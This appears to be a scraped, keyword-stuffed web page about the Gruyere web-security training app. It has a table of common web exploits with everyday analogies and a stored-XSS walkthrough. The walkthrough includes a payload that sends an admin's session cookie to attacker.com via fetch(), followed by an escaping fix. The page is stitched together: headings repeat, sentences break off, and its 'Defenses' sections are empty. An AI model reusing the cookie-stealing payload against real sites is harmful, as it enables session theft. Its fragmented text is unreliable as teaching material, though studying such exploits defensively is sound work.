Treasury News Network

Gruyere Learn Web Application Exploits Defenses Top

Gruyere Learn Web Application Exploits Defenses Top

Target Layer: Authorization logic
Exploit: User can view or edit another user’s data by changing an ID in the URL or API parameter (IDOR – Insecure Direct Object References).

Defenses:

| Exploit | Description | Real-World Analogy | |---------|-------------|---------------------| | XSS (Cross-Site Scripting) | Injecting malicious scripts into trusted websites | A sticky note left on a cash register that tricks the next cashier | | SQL Injection | Manipulating database queries via unsanitized input | Calling a hotel front desk and pretending to be the manager to get a master key | | CSRF (Cross-Site Request Forgery) | Tricking authenticated users into unwanted actions | A signed check you didn’t write but your bank accepts | | Command Injection | Running OS commands through a vulnerable app | Yelling “open sesame” and the door obeys without checking | | Path Traversal | Reading arbitrary files on the server | Using ../../ to climb out of the guest folder into the vault | | IDOR (Insecure Direct Object Reference) | Accessing unauthorized data by changing an ID | Changing ?invoice=123 to ?invoice=124 to see someone else’s bill | | SSRF (Server-Side Request Forgery) | Making the server attack internal systems | Tricking a receptionist into calling a locked room for you | gruyere learn web application exploits defenses top

Let’s look at a specific interaction to solidify the concept.

Target: Gruyere’s "Profile settings" – the age field. Step 1: Exploit Input: 35<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> The app saves this to the datastore. Step 2: Consequence Every time an admin views your profile, their admin session cookie is sent to the attacker’s server. The attacker reloads the page as the admin. Step 3: The Fix (Code Level) Replace: self.response.write("<div>Age: %s</div>" % user.age) With: self.response.write("<div>Age: %s</div>" % cgi.escape(user.age)) Target Layer: Authorization logic Exploit: User can view

Step 4: The Verification Attempt the exploit again. Instead of running JavaScript, you literally see the text 35<script>fetch... displayed harmlessly on the page.

Target Layer: Backend network
Exploit: Attacker makes the server fetch an internal resource (metadata endpoint, localhost services). Let’s look at a specific interaction to solidify

Defenses: